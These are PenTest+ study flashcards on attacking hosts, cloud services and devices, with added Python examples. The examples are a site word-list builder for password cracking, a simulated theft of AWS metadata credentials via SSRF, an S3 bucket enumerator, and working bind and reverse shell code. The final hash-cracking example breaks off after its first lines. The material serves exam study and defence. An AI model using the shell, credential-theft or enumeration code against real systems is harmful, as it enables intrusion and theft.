Chap 10 - Exploiting Host Vulnerabilities Flashcards

1
Q

Scott wants to crawl his penetration testing target’s website and then build a word list using the data he recovers to help with his password cracking efforts. Which of the following tools should he use?

A. DirBuster
B. CeWL
C. OLLY
D. Grep‐o‐matic

A

CeWL

CeWL, the Custom Word List generator, is a tool designed to spider a website and build a word list from the pages and files it finds. The word list can then be used to help with password cracking, and it is usually more effective than a generic dictionary because it captures the target's own product names, staff names, and jargon.

2
Q

CeWL

A

CeWL is the “Custom Word List generator.” It is a Ruby application that spiders websites to create word lists based on the content it discovers, which can then be used in tasks such as password cracking. A typical run limits crawl depth and minimum word length and also collects e-mail addresses, for example: cewl -d 2 -m 5 -e -w words.txt https://target.example
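What CeWL does, shown as an added example in Python (this is not CeWL's own code, which is Ruby): the pages in SAMPLE_PAGES are constructed stand-ins for what the spider would fetch. The script extracts visible text and mailto: addresses, skips script and style blocks, drops words shorter than a minimum length, and ranks the rest by frequency the way CeWL's count option reports them.

```python
"""Minimal CeWL-style word list builder (added example, not CeWL's own code).

Takes HTML pages that are already fetched, pulls out words and e-mail
addresses, and ranks the words by frequency. The sample pages are constructed."""
import re
from collections import Counter
from html.parser import HTMLParser

# Constructed sample of what a spider might fetch from a target site.
SAMPLE_PAGES = {
    "/": "<html><title>Acme Widgets</title><body><h1>Welcome to Acme Widgets</h1>"
         "<p>Contact sales@acme-widgets.example for our WidgetPro line.</p>"
         "<script>var x = 'ignoreme';</script></body></html>",
    "/about": "<html><body><p>Acme was founded in Springfield in 1998. "
              "Our flagship product, WidgetPro, ships worldwide.</p>"
              "<a href='mailto:hr@acme-widgets.example'>Careers</a></body></html>",
}


class _TextExtractor(HTMLParser):
    """Collects visible text and mailto: targets, skipping script/style content."""

    def __init__(self):
        super().__init__()
        self.parts = []
        self._skip = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1
        # mailto: links carry addresses that never appear as page text
        for name, value in attrs:
            if name == "href" and value and value.startswith("mailto:"):
                self.parts.append(value[len("mailto:"):])

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.parts.append(data)


EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
WORD_RE = re.compile(r"[A-Za-z][A-Za-z0-9]*")


def build_wordlist(pages, min_length=3, lowercase=False):
    """Return (words most-frequent-first, sorted e-mail addresses) from path -> HTML."""
    counts = Counter()
    emails = set()
    for html in pages.values():
        extractor = _TextExtractor()
        extractor.feed(html)
        text = " ".join(extractor.parts)
        emails.update(EMAIL_RE.findall(text))
        for word in WORD_RE.findall(text):
            if len(word) >= min_length:
                counts[word.lower() if lowercase else word] += 1
    # most frequent first, alphabetical as the tie-break
    ranked = sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))
    return [w for w, _ in ranked], sorted(emails)


if __name__ == "__main__":
    words, emails = build_wordlist(SAMPLE_PAGES, min_length=5)
    print("\n".join(words))
    print("# emails:", ", ".join(emails))
```

Product names ("WidgetPro") float to the top of the list, which is exactly why a site-derived list beats a generic dictionary against an organization's users; pipe the output into a cracker with a rule set that appends digits and symbols.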

3
Q

OLLY

A

OllyDbg is a Windows-specific debugger that operates at the assembly language level, making it suitable for reverse engineering and dynamic analysis of executables. It handles 32-bit binaries only; 64-bit targets need a debugger such as x64dbg or WinDbg.

4
Q

DirBuster

A

DirBuster is a Java application designed to brute-force directories and filenames on web servers, often used during penetration testing to discover hidden files and directories. Although it is included in the PenTest+ objectives, it has not been updated since 2013, and alternatives such as gobuster, ffuf, or feroxbuster are usually more practical in modern engagements.

5
Q

Michelle wants to attack the underlying hypervisor for a virtual machine. What type of attack is most likely to be successful?

A. Container escape
B. Compromise the administrative interface
C. Hypervisor DoS
D. VM escape

A

Compromise the administrative interface

The most practical answer is to compromise the administrative interface for the underlying hypervisor. Although VM escape would be a useful tool, very few VM escape exploits have been discovered, and each has been quickly patched. That means that penetration testers can’t rely on one being available and unpatched when they encounter a VM host and should instead target administrative rights and access methods.

6
Q

Jeff identifies the IP address contained in the content delivery network (CDN) configuration for his target organization. He knows that this server’s content is replicated by the CDN, and that if he is able to conduct a denial‐of‐service attack on the host he will be able to take down his target’s web presence. What type of attack is Jeff preparing to conduct?

A. A side ‐channel attack
B. A direct‐to‐origin attack
C. A federation misconfiguration attack
D. A metadata service attack

A

A direct‐to‐origin attack

Jeff is preparing a direct‐to‐origin attack, which targets the underlying system or resource behind a load balancer, CDN, or other similar system. If he can create a denial‐of‐service condition, the front‐end network or systems will not be able to get updates or data from it, allowing him to bypass the protections and resilience a load balancer or content delivery network provides. A side‐channel attack in most cloud environments will focus on taking advantage of being on the same physical hardware. Federation misconfiguration attacks attempt to take advantage of an insecure configuration in the federation linkages between two organizations, and metadata service attacks leverage native services provided by cloud providers that are intended to allow easy queries about systems running inside their environment, such as hostnames, IP addresses, or other metadata about the instances.

7
Q

Side‐channel attack

A

A side-channel attack in cloud environments exploits the shared hardware of virtualized systems. Attackers leverage shared resources or vulnerabilities in virtualization to capture information without directly compromising the target system.

For example, resizing virtual drives can leave remnant data exposed, though modern cloud providers mitigate this risk with encryption.

8
Q

D2O

A

A direct-to-origin (D2O) attack is a type of distributed denial-of-service (DDoS) attack that bypasses content delivery networks (CDNs) or similar protections to directly target the origin infrastructure.

Once the origin’s real IP address is found (DNS history, mail and SPF records, certificate transparency logs, and forgotten subdomains are common sources), the attacker hits a host with far less scaling and filtering than the CDN, negating its benefit. The standard defense is to allow only the CDN’s published egress ranges through the origin’s firewall.

9
Q

Federation misconfiguration attack

A

A federation misconfiguration attack targets weaknesses in the federation services that let organizations share authentication and authorization data.

Misconfigurations in these systems, such as Active Directory Federation Services (ADFS), can lead to unauthorized access or data leakage due to excessive trust or improperly secured connections between on-premises and cloud environments like Azure.

10
Q

Metadata service attack

A

A metadata service attack exploits cloud instance metadata APIs, which are intended to provide details such as configuration information and temporary credentials to the instance itself.

In AWS, for example, an attacker who can make the instance issue HTTP requests (typically through an SSRF flaw) can query the metadata service at 169.254.169.254 for the temporary credentials of the IAM role attached to the instance and then use them against AWS APIs such as S3, potentially escalating to other services or sensitive data. Requiring IMDSv2, which demands a session token obtained with a PUT request, blocks the common GET-only SSRF case.
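The credential path described above, as an added example that is not AWS code: a small in-memory model of the instance metadata service stands in for 169.254.169.254. The role name, key values and the tok- tokens are constructed; the paths and header names are the real IMDS ones. It shows that a GET-only SSRF recovers the role credentials from IMDSv1 and fails once IMDSv2 is required, because the session token can only be obtained with a PUT.

```python
"""Model of the EC2 instance metadata credential path (added example; not AWS
code). Shows why IMDSv1 leaks role credentials to a GET-only SSRF and how the
IMDSv2 session token stops that. Credential values are constructed."""
import json

# Constructed: what IMDS would serve for this instance's role.
ROLE_NAME = "web-instance-role"
ROLE_CREDS = {
    "AccessKeyId": "ASIAEXAMPLE000000001",        # constructed, not a real key
    "SecretAccessKey": "example/secret/not/real",
    "Token": "example-session-token",
}
TTL_HEADER = "x-aws-ec2-metadata-token-ttl-seconds"   # real IMDSv2 header names
TOKEN_HEADER = "x-aws-ec2-metadata-token"


class FakeIMDS:
    """Minimal IMDS. require_token=True mimics HttpTokens=required (IMDSv2 only)."""

    def __init__(self, require_token):
        self.require_token = require_token
        self._tokens = set()

    def request(self, method, path, headers=None):
        headers = {k.lower(): v for k, v in (headers or {}).items()}
        if method == "PUT" and path == "/latest/api/token":
            if TTL_HEADER not in headers:          # real IMDS rejects a PUT without a TTL
                return 400, ""
            token = f"tok-{len(self._tokens) + 1}"   # constructed token format
            self._tokens.add(token)
            return 200, token
        if method != "GET":
            return 405, ""
        if self.require_token and headers.get(TOKEN_HEADER) not in self._tokens:
            return 401, ""                          # v2-only instances answer 401 here
        if path == "/latest/meta-data/iam/security-credentials/":
            return 200, ROLE_NAME
        if path == f"/latest/meta-data/iam/security-credentials/{ROLE_NAME}":
            return 200, json.dumps(ROLE_CREDS)
        return 404, ""


def steal_creds_via_get_only_ssrf(imds):
    """An SSRF that can only issue GETs (e.g. an image-fetch URL parameter).
    Returns the credential dict on success, or None."""
    status, body = imds.request("GET", "/latest/meta-data/iam/security-credentials/")
    if status != 200:
        return None
    role = body.strip()
    status, body = imds.request("GET", f"/latest/meta-data/iam/security-credentials/{role}")
    return json.loads(body) if status == 200 else None


def fetch_creds_imdsv2(imds):
    """The legitimate IMDSv2 flow: PUT for a token, then GET with it."""
    status, token = imds.request("PUT", "/latest/api/token", {TTL_HEADER: "21600"})
    if status != 200:
        return None
    hdrs = {TOKEN_HEADER: token}
    path = f"/latest/meta-data/iam/security-credentials/{ROLE_NAME}"
    status, body = imds.request("GET", path, hdrs)
    return json.loads(body) if status == 200 else None


if __name__ == "__main__":
    print("IMDSv1 via SSRF :", steal_creds_via_get_only_ssrf(FakeIMDS(require_token=False)))
    print("IMDSv2 via SSRF :", steal_creds_via_get_only_ssrf(FakeIMDS(require_token=True)))
    print("IMDSv2 legit    :", fetch_creds_imdsv2(FakeIMDS(require_token=True)))
```

On a real instance the equivalent hardening is aws ec2 modify-instance-metadata-options --instance-id <id> --http-tokens required, and the same check (a GET to the credentials path without a token should get a 401) can be run from the instance with curl. Note that an SSRF that can issue arbitrary methods and headers still defeats this, so IMDSv2 narrows the attack rather than eliminating it.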

11
Q

Claire knows that her target organization leverages a significant number of IoT devices and that she is likely to need to use one or more of them as pivot points for her penetration test. Which of the following is not a common concern when conducting a penetration test involving IoT devices?

A. Impacts to availability
B. Fragile environments
C. Data leakage
D. Data corruption

A

Data leakage

Although IoT devices may leak data due to the use of insecure protocols or data storage, that’s a concern for the defender. Pentesters should actively be looking for that sort of opportunity! Claire knows that IoT devices may fail when scanned or compromised, and that this can cause issues. They may also be part of a fragile environment that may not be designed to handle scans, or where delayed responses or downtime may cause issues for her client. She also knows that data corruption may occur if devices are not behaving properly due to a penetration test and that in environments where IoT data is critical that this could be a real issue. Claire should carefully discuss this with her client and ensure that they understand the risks and how to constrain them if testing IoT devices is important to the pentest.

12
Q

Susan wants to use a web application vulnerability scanner to help map an organization’s web presence and to identify existing vulnerabilities. Which of the following tools is best suited to her needs?

A. Paros
B. CUSpider
C. Patator
D. w3af

A

w3af

The Web Application Attack and Audit Framework (w3af) is a web application testing and exploit tool that can spider the site and test applications and other security issues that may exist there. The Paros proxy is an excellent web proxy tool often used by web application testers, but it isn’t a full‐fledged testing suite like w3af. CUSpider and other versions of Spider are tools used to find sensitive data on systems, and Patator is a brute‐force tool.

13
Q

Paros

A

Paros is a web proxy tool often used by penetration testers for evaluating web applications. It enables users to intercept, manipulate, and analyze HTTP requests and responses, but it is not a comprehensive testing suite like w3af.

14
Q

Patator

A

Patator is a brute-forcing tool that supports a variety of protocols and services. It is less user-friendly compared to Hydra or Medusa because it requires more manual filtering based on result codes, but it provides unique features that can be advantageous in specific testing scenarios.

15
Q

w3af

A

w3af is a web application attack and audit framework. It is used as a tool during penetration testing to identify vulnerabilities in web applications, allowing testers to exploit and analyze them for security weaknesses. Its functionalities include both vulnerability detection and attack simulation.

16
Q

Madhuri has discovered that the organization she is conducting a penetration test against makes extensive use of industrial control systems to manage a manufacturing plant. Which of the following components is least likely to respond to her normal penetration testing tools like Nmap and Metasploit?

A. RTUs
B. Field devices
C. PLCs
D. Master stations

A

Field devices

Field devices are controlled by remote terminal units (RTUs) or programmable logic controllers (PLCs), which are likely to connect to a network and accept commands from a master station or operator station. Field devices are often controlled via digital or analog commands from the RTUs and PLCs, and are thus not likely to use protocols or access methods that are supported by normal penetration testing tools.

17
Q

RTUs

A

An RTU, or Remote Terminal Unit, is a device used in SCADA (Supervisory Control and Data Acquisition) systems. RTUs collect data from sensors and other devices and transmit it to a central system for monitoring and control. They are a key component in automating and managing industrial processes.

18
Q

Field Devices

A

Field devices are the sensors, actuators, and similar components in industrial control systems (ICS) that are controlled by RTUs (Remote Terminal Units) or PLCs (Programmable Logic Controllers).

These devices often operate using analog or digital signals rather than IP networking, so they do not speak the protocols that typical penetration testing tools such as Nmap and Metasploit understand.

19
Q

PLCs

A

PLCs, or Programmable Logic Controllers, are specialized industrial computers used in automation to control machinery and processes. They are integral components of Industrial Control Systems (ICS) and are commonly employed in manufacturing, utilities, and other industrial environments.

PLCs execute specific control tasks based on input from field devices such as sensors and drive outputs to actuators.

20
Q

Master station

A

Master stations are components within SCADA (Supervisory Control and Data Acquisition) systems that manage and oversee the entire SCADA environment. They are network-connected and control other components like PLCs (Programmable Logic Controllers) and RTUs (Remote Terminal Units) to ensure the proper monitoring and automation of industrial processes.

21
Q

Components of SCADA

A

The components of a SCADA (Supervisory Control and Data Acquisition) system include:

  • Field Devices: Sensors and actuators that collect data or perform actions.
  • Remote Terminal Units (RTUs): Devices that collect data from field devices and transmit it to the master station.
  • Programmable Logic Controllers (PLCs): Controllers used for automating processes and controlling field devices.
  • Master Stations: Centralized systems that manage the SCADA network and oversee operations.
  • Human-Machine Interfaces (HMIs): Interfaces that allow operators to monitor and control the system.

22
Q

Ben wants to conduct a penetration test against a service that uses containers hosted by a cloud service provider. Which of the following targets is not typically part of the scope for a penetration test against a containerized environment?

A. The application
B. APIs used by the containers
C. Databases used by the containers
D. The underlying containerization service

A

The underlying containerization service

Attacking the underlying cloud hosting provider’s containerization service is typically prohibited by terms of service from the provider, and is thus unlikely to be part of the scope for a penetration test of a cloud‐hosted containerization service. The application running in the container, the APIs used by the containers, and databases they access are more likely to be part of the engagement.

23
Q

Jocelyn wants to conduct a resource exhaustion attack against her penetration testing target, which uses an autoscaling service architecture that leverages a content delivery network. What technique is most likely to help her succeed?

A. A BLE attack
B. A direct‐to‐origin attack
C. An IPMI attack
D. A VM escape attack

A

A direct‐to‐origin attack

If Jocelyn wants to successfully cause a denial‐of‐service condition, her best bet is a direct‐to‐origin attack. Exhausting the resources for the source or origin server for the service is far more likely to be successful than attempting to take on the resources of a cloud‐hosted content delivery network. BLE attacks are used against devices that use Bluetooth’s low energy mode. IPMI is a set of interface specifications for remote management and monitoring for computer systems and isn’t typically a target for a resource exhaustion attack. A VM escape attack might be useful if Jocelyn had already compromised a host and wanted to gain further access, but again it isn’t a useful way to attack a service like the one that is described.

24
Q

IPMI

A

The Intelligent Platform Management Interface (IPMI) is a specialized interface used for hardware-level management of servers, especially when the operating system is non-functional or hardware issues occur. It is implemented by the baseboard management controller (BMC), such as Dell’s iDRAC or HPE’s iLO, which is managed over Ethernet (IPMI itself listens on UDP port 623) and should be isolated in a separate management VLAN.

25
Q

Isabelle wants to gain access to a cloud infrastructure as a service environment. Which of the following is not a common technique to gain this type of access for a penetration test?

A. Acquire an inadvertently exposed key through a public code repository.
B. Use a brute‐force tool against a harvested credential that requires two‐factor.
C. Acquire an inadvertently exposed key through a misconfigured object store.
D. Probe for incorrectly assigned permissions for a service or system.

A

Use a brute‐force tool against a harvested credential that requires two‐factor.

Brute‐forcing multifactor is the only item on this list that is not a common method of attempting to gain access to a cloud environment. Multifactor authentication is designed to be resistant to brute force, meaning that other means would be necessary to access an account that uses it.

26
Q

Charleen has been tasked with the components of a penetration test that deal with mobile devices at a large client organization. She has been given a standard corporate device to test that uses the organization’s base configuration for devices that are issued to employees. As part of her team, you’ve been asked to provide input on the penetration testing process. Answer each of the following questions based on your knowledge about mobile device attacks, vulnerabilities, and analysis tools.

Charleen wants to use a cloned image of a phone to see if she can access it using brute‐force passcode‐breaking techniques. Which of the following techniques will allow her to do this without an automatic wipe occurring if “wipe after 10 passcode attempts” is set for the device?

A. Reverse engineering
B. Containerization
C. Sandbox analysis
D. Rainbow tables

A

Sandbox analysis

Charleen could place the device image in a controlled sandbox and make passcode attempts against it, resetting the device each time it wipes itself, allowing her to make many attempts. She could also run many copies in parallel to allow even faster brute‐force attempts. Reverse engineering is used to analyze binaries and code and does not suit this purpose. Containerization is used to place applications in a virtualized environment, and rainbow tables are used to attack hashed passwords and aren’t useful for this purpose, either.

27
Q

Charleen has been tasked with the components of a penetration test that deal with mobile devices at a large client organization. She has been given a standard corporate device to test that uses the organization’s base configuration for devices that are issued to employees. As part of her team, you’ve been asked to provide input on the penetration testing process. Answer each of the following questions based on your knowledge about mobile device attacks, vulnerabilities, and analysis tools.

Charleen has determined that the organization she is testing uses certificate pinning for their web application. What technique is most likely to help her overcome this so that she can conduct an on‐path attack?

A. Social engineering
B. Reverse engineering
C. Using a flaw in object storage security
D. Data exfiltration

A

Social engineering

Persuading a user to add an additional certificate to the system or device’s certificate store is the only option from this list that will help to defeat certificate pinning. Reverse engineering might be useful to determine what system is pinned if the certificate store isn’t available and the application is. Object storage security issues may provide access to data or a place to drop data, but there’s nothing in the question to indicate that this would be a viable solution, and data exfiltration is a term that describes getting data out of an organization.

28
Q

Charleen has been tasked with the components of a penetration test that deal with mobile devices at a large client organization. She has been given a standard corporate device to test that uses the organization’s base configuration for devices that are issued to employees. As part of her team, you’ve been asked to provide input on the penetration testing process. Answer each of the following questions based on your knowledge about mobile device attacks, vulnerabilities, and analysis tools.

Charleen wants to perform static code analysis of the mobile application her target installed on the device in her possession. Which of the following tools should she select?

A. Objection
B. MobSF
C. Frida
D. Burp Suite

A

MobSF

MobSF is the only tool listed that provides static code analysis. Objection and Frida are runtime instrumentation tools (Frida injects a JavaScript engine into a running process; Objection is a toolkit built on top of it), and Burp Suite is a web application testing suite.

29
Q

Objection

A

Objection is a runtime mobile exploration toolkit powered by Frida. It lets penetration testers hook into a running application and execute code in its context, for example to bypass protections such as certificate pinning or root detection, or to explore application behavior, without needing a jailbroken or rooted device.

30
Q

Frida

A

Frida is a dynamic instrumentation toolkit that injects a JavaScript engine into native applications on Android, iOS, Windows, macOS, and Linux so that functions can be hooked, traced, or rewritten at runtime.

It is often used to intercept and modify application behavior, such as bypassing input validation, certificate pinning, or authentication checks. Frida exposes bindings for Python, Node.js, and several other languages.

31
Q

MobSF

A

MobSF, or the Mobile Security Framework, is an automated penetration testing, security assessment, and malware analysis framework for Android, iOS, and Windows applications.

It supports both static and dynamic analysis of applications and integrates with continuous integration/deployment pipelines.

32
Q

Burp Suite

A

Burp Suite is a web application vulnerability scanning and penetration testing toolset. It offers various versions, including a free community version, and is widely used for web application security assessments. Burp Suite is specifically highlighted in the context of web and mobile application security

33
Q

Alice is conducting a penetration test of an organization’s AWS infrastructure. What tool should she select from the following list if she wants to exploit AWS?

A. Pacu
B. Cloud Custodian
C. CloudBrute
D. BashAWS

A

Pacu

Pacu is a dedicated AWS exploitation and penetration testing framework. Cloud Custodian is a useful management tool that can be used to identify misconfigurations, CloudBrute is a cloud enumeration tool, and BashAWS was made up for this question.

34
Q

Pacu

A

Pacu is an exploitation framework specifically designed for Amazon Web Services (AWS). It includes modules to test for privilege escalation, disrupt monitoring efforts, implant backdoors via IAM modifications, and execute remote code using AWS systems management tools.

35
Q

Cloud Custodian

A

Cloud Custodian is a compliance and management tool for cloud services. It is often used to identify and remediate issues in cloud configurations, ensuring adherence to organizational policies and standards.

36
Q

CloudBrute

A

CloudBrute is a cloud enumeration tool used to identify applications and storage across multiple cloud providers. It does not require credentials and employs brute-force techniques such as wordlists and name mutations to discover cloud resources.

37
Q

What type of attack focuses on accessing the underlying hardware in a shared cloud environment in order to gain information about other virtualized systems running on it?

A. A direct‐to‐origin attack
B. A watering hole attack
C. A side‐channel attack
D. An object storage attack

A

A side‐channel attack

Side‐channel attacks attempt to gain information about other systems by gathering data from an underlying system or infrastructure rather than directly from the running virtual system itself. Direct‐to‐origin attacks attempt to identify the source system that powers a content delivery network or other scaling service to allow denial‐of‐service or resource exhaustion attacks to apply to a smaller, less capable target. Watering hole attacks are social engineering attacks that leverage a frequently used website to host malware as part of an attack. An object storage attack focuses on services like S3 in AWS and often looks for improperly set permissions or other flaws that can be leveraged.

38
Q

Isaac wants to test for insecure S3 storage buckets belonging to his target organization. What process can he use to test for this type of insecure configuration?

A. Navigate to the bucket’s URL using a web browser.
B. Use APKX to automatically validate known buckets by name.
C. Use a fuzzer to generate bucket names and test them using the fuzzer’s testing capability.
D. Conduct a direct‐to‐origin attack to find the original bucket source URL.

A

Navigate to the bucket’s URL using a web browser.

One of the simplest techniques to validate whether a bucket is accessible is to simply navigate to the bucket’s URL. If it provides a file listing, the bucket is not configured securely. A 403 response with an AccessDenied error means the bucket exists but does not allow anonymous listing, and a NoSuchBucket error means the name is unused; the same check can be scripted with aws s3 ls s3://<bucket> --no-sign-request. APKX is an Android APK extractor tool. Fuzzers are used for software testing, not for bucket security testing, and direct‐to‐origin attacks attempt to bypass content delivery networks, load balancers, and similar tools to allow attacks directly against source systems for denial‐of‐service or resource exhaustion attacks.
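The check described above, scripted as an added example (not CloudBrute or any other tool from the page): candidate names are built from the organization name and a few keywords, the way CloudBrute-style wordlist mutations do, and each HTTP response is classified by parsing the XML S3 returns. The bodies in CONSTRUCTED_RESPONSES are constructed to match S3's formats so the example runs offline; in practice they come from requesting https://<bucket>.s3.amazonaws.com/.

```python
"""Added example: generate candidate S3 bucket names and classify the response
a browser or curl would get from https://<bucket>.s3.amazonaws.com/.
Responses are constructed to look like S3's, so this runs offline."""
import xml.etree.ElementTree as ET
from itertools import product

S3_NS = "{http://s3.amazonaws.com/doc/2006-03-01/}"   # namespace S3 uses on listings


def candidate_names(org, keywords=("backup", "assets", "logs"), seps=("", "-", ".")):
    """org + keyword permutations; bucket names are lowercase and 3-63 characters."""
    names = {org}
    for kw, sep in product(keywords, seps):
        names.add(f"{org}{sep}{kw}")
        names.add(f"{kw}{sep}{org}")
    return sorted(n for n in names if 3 <= len(n) <= 63 and n == n.lower())


def classify_s3_response(status, body):
    """Return (verdict, keys): verdict is listable, exists_private, nonexistent or unknown."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return ("unknown", [])
    if status == 200 and root.tag == f"{S3_NS}ListBucketResult":
        keys = [c.findtext(f"{S3_NS}Key") for c in root.iter(f"{S3_NS}Contents")]
        return ("listable", keys)
    if root.tag == "Error":                       # S3 error documents carry no namespace
        code = root.findtext("Code")
        if code == "NoSuchBucket":
            return ("nonexistent", [])
        if code in ("AccessDenied", "AllAccessDisabled"):
            return ("exists_private", [])
    return ("unknown", [])


# Constructed responses in S3's formats; a real run would fetch these over HTTPS.
CONSTRUCTED_RESPONSES = {
    "acme-backup": (200,
        '<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">'
        '<Name>acme-backup</Name><Contents><Key>db/prod-2024.sql.gz</Key></Contents>'
        '<Contents><Key>.env</Key></Contents></ListBucketResult>'),
    "acme-assets": (403,
        '<Error><Code>AccessDenied</Code><Message>Access Denied</Message></Error>'),
    "acme-logs": (404,
        '<Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist'
        '</Message><BucketName>acme-logs</BucketName></Error>'),
}


def triage(org, responses):
    """Map each candidate name that has a captured response to its verdict."""
    findings = {}
    for name in candidate_names(org):
        if name in responses:
            findings[name] = classify_s3_response(*responses[name])
    return findings


if __name__ == "__main__":
    for name, (verdict, keys) in triage("acme", CONSTRUCTED_RESPONSES).items():
        print(f"{name:15} {verdict:15} {keys}")
```

A listable bucket is the finding the question describes; "exists_private" is still worth recording, because a bucket that denies anonymous listing may allow anonymous reads of individual objects whose keys are guessable, and because a name that exists confirms the organization's naming convention for further enumeration.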

39
Q

APKX

A

APKX is a wrapper for various Java decompilers and DEX converters that simplifies extracting Java source code from Android application packages (APKs). It is particularly useful for analyzing the Java code within APK files.

40
Q

Jocelyn wants to conduct a credential harvesting attack against an organization. What technique is she most likely to employ to accomplish the attack?

A. Vulnerability scanning
B. Capturing data from other systems on the same physical host
C. Sending a phishing email
D. Using an SDK to access service configuration data.

A

Sending a phishing email

Credential harvesting can take many forms, but one of the most common options is to use a phishing attack to obtain credentials that can be used to access accounts and systems belonging to a target organization. Simply conducting vulnerability scanning will not result in credentials being obtained, capturing data from other systems on a shared underlying system is a side‐channel attack and is unlikely to result in acquiring credentials, and SDKs may provide some useful information but are unlikely to directly provide credentials.

41
Q

Simone has been asked to check for IPMI interfaces on servers at her target organization. Where is she most likely to find IPMI interfaces to probe?

A. In the organization’s DMZ
B. In a private data center VLAN
C. In the organization’s workstation VLAN
D. On the organization’s Wi‐Fi network

A

In a private data center VLAN

Most organizations recognize that IPMI interfaces need additional protection and place them on a private VLAN in their data center. Additional access controls like VPN requirements or bastion hosts are also commonly used. IPMI interfaces should not be exposed in a DMZ or a workstation VLAN, let alone on a Wi‐Fi network!

42
Q

Selah wants to use a brute‐force attack against the SSH service provided by one of her targets. Which of the following tools is not designed to brute‐force services like this?

A. Patator
B. Hydra
C. Medusa
D. Minotaur

A

Minotaur

Patator, Hydra, and Medusa are all useful brute‐forcing tools. Minotaur may be a great name for a penetration testing tool, but the authors of this book aren’t aware of any tool named Minotaur that is used by penetration testers!

43
Q

Hydra

A

Hydra is a credential testing tool commonly used in penetration testing to perform brute-force attacks against network protocols and services. It supports numerous protocols, including SSH, FTP, HTTP, and many others, enabling automated testing of login credentials during security assessments.

44
Q

Medusa

A

Medusa is a credential testing tool used in penetration testing to perform brute-force attacks against remote authentication services. It supports various protocols, including HTTP, SSH, FTP, and others, and is designed for speed and modularity, making it suitable for large-scale penetration testing tasks.

45
Q

After compromising a remote host, Cameron uses SSH to connect to port 4444 from his penetration testing workstation. What type of remote shell has he set up?

A. A reverse shell
B. A root shell
C. A bind shell
D. A blind shell

A

A bind shell

Cameron has set up a bind shell, which connects a shell to a service port. A reverse shell would have initiated a connection from the compromised host to his penetration testing workstation (or another system Cameron has access to). The question does not provide enough information to determine if the shell might be a root shell, and blind shell is not a common penetration testing term.

46
Q

reverse shell

A

A reverse shell is a type of shell in penetration testing where the target machine initiates a connection back to the attacker’s machine.

This setup allows the attacker to gain remote access and execute commands on the target system while bypassing network restrictions such as firewalls and NAT, which often block incoming connections but allow outgoing ones.

47
Q

bind shell

A

A bind shell is a type of shell in penetration testing where the target machine opens a network port and listens for incoming connections from the attacker’s machine.

Once connected, the attacker can execute commands on the target system. Unlike a reverse shell, a bind shell requires the attacker to actively connect to the target, which might be blocked by firewalls or NAT configurations, and the open listening port is also easy for defenders to spot.
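Both shell directions over loopback, as an added example that is not from the page. The target-side command loop is identical in both cases; what differs is which side calls connect(). Commands are executed with subprocess and no shell, and a sentinel line marks the end of each response. The <<EOF>> sentinel and the loopback port choices are assumptions of this example.

```python
"""Added example: bind shell vs reverse shell, run over loopback so it executes
offline. Only the direction of the TCP connection differs."""
import shlex
import socket
import subprocess
import threading

SENTINEL = b"<<EOF>>\n"   # assumed end-of-response marker for this example


def _serve_commands(conn):
    """Target side: read newline-terminated commands, send back their output."""
    with conn, conn.makefile("rb") as rfile:
        for line in rfile:
            cmd = line.decode().strip()
            if cmd == "exit":
                break
            if not cmd:
                continue
            try:
                out = subprocess.run(shlex.split(cmd), capture_output=True, timeout=5)
                conn.sendall(out.stdout + out.stderr)
            except (OSError, ValueError, subprocess.TimeoutExpired) as exc:
                conn.sendall(f"error: {exc}\n".encode())
            conn.sendall(SENTINEL)


def bind_shell_target(listen_addr):
    """Bind shell: the target listens; the attacker must be able to reach this port."""
    srv = socket.create_server(listen_addr)
    port = srv.getsockname()[1]

    def run():
        conn, _ = srv.accept()
        srv.close()
        _serve_commands(conn)

    threading.Thread(target=run, daemon=True).start()
    return port


def reverse_shell_target(attacker_addr):
    """Reverse shell: the target dials out, which egress-only firewalls and NAT allow."""
    conn = socket.create_connection(attacker_addr)
    threading.Thread(target=_serve_commands, args=(conn,), daemon=True).start()


def run_remote(conn, cmd):
    """Attacker side: send one command and collect output up to the sentinel."""
    conn.sendall(cmd.encode() + b"\n")
    buf = b""
    while not buf.endswith(SENTINEL):
        chunk = conn.recv(4096)
        if not chunk:
            return buf.decode()
        buf += chunk
    return buf[:-len(SENTINEL)].decode()


def demo_bind(cmd):
    """Attacker connects to the target's listening port."""
    port = bind_shell_target(("127.0.0.1", 0))
    with socket.create_connection(("127.0.0.1", port)) as conn:
        out = run_remote(conn, cmd)
        conn.sendall(b"exit\n")
    return out


def demo_reverse(cmd):
    """Attacker listens; the target connects back to it."""
    listener = socket.create_server(("127.0.0.1", 0))
    reverse_shell_target(listener.getsockname())
    conn, _ = listener.accept()
    listener.close()
    with conn:
        out = run_remote(conn, cmd)
        conn.sendall(b"exit\n")
    return out


if __name__ == "__main__":
    print("bind    :", demo_bind("echo bind-ok").strip())
    print("reverse :", demo_reverse("echo reverse-ok").strip())
```

Read the two demo functions side by side: in demo_bind the attacker's create_connection() is the inbound connection a perimeter firewall would have to permit, while in demo_reverse the only inbound accept() happens on the attacker's listener, which is why reverse shells are the default choice when the target sits behind NAT or an ingress-filtering firewall.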

48
Q

root shell

A

A root shell is a command-line interface that operates with root (administrator) privileges, granting full access to a system. In penetration testing, gaining a root shell is often a goal during privilege escalation, as it allows unrestricted execution of commands and control over the target system.

49
Q

Jim wants to crack the hashes from a password file he recovered during a penetration test. Which of the following methods will typically be fastest?

A. John the Ripper
B. Rainbow Road
C. Hashcat
D. CeWL

A

Hashcat

Hashcat would be the fastest when it can take advantage of a powerful graphics card, and John the Ripper will typically be the slowest of the password cracking methods listed (John’s jumbo build can also use OpenCL, but Hashcat remains the usual choice for GPU cracking). CeWL is a word list or dictionary generator and isn’t a password cracker, and Rainbow Road is not a penetration testing tool.
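The core loop any of these crackers runs, as an added example (not Hashcat's or John's code): infer the digest type from the hash length, expand each word list entry with hashcat-style rules, and compare. The hash dump and word list are constructed, and the plaintexts are chosen so that a rule is needed to hit each one. Hashcat does exactly this on a GPU across billions of candidates per second; this Python version is the serial CPU equivalent, which is the whole reason for the speed difference the card describes.

```python
"""Added example: dictionary attack with a subset of hashcat's rule syntax
against unsalted hashes whose type is inferred from their length.
Hash dump and word list are constructed."""
import hashlib

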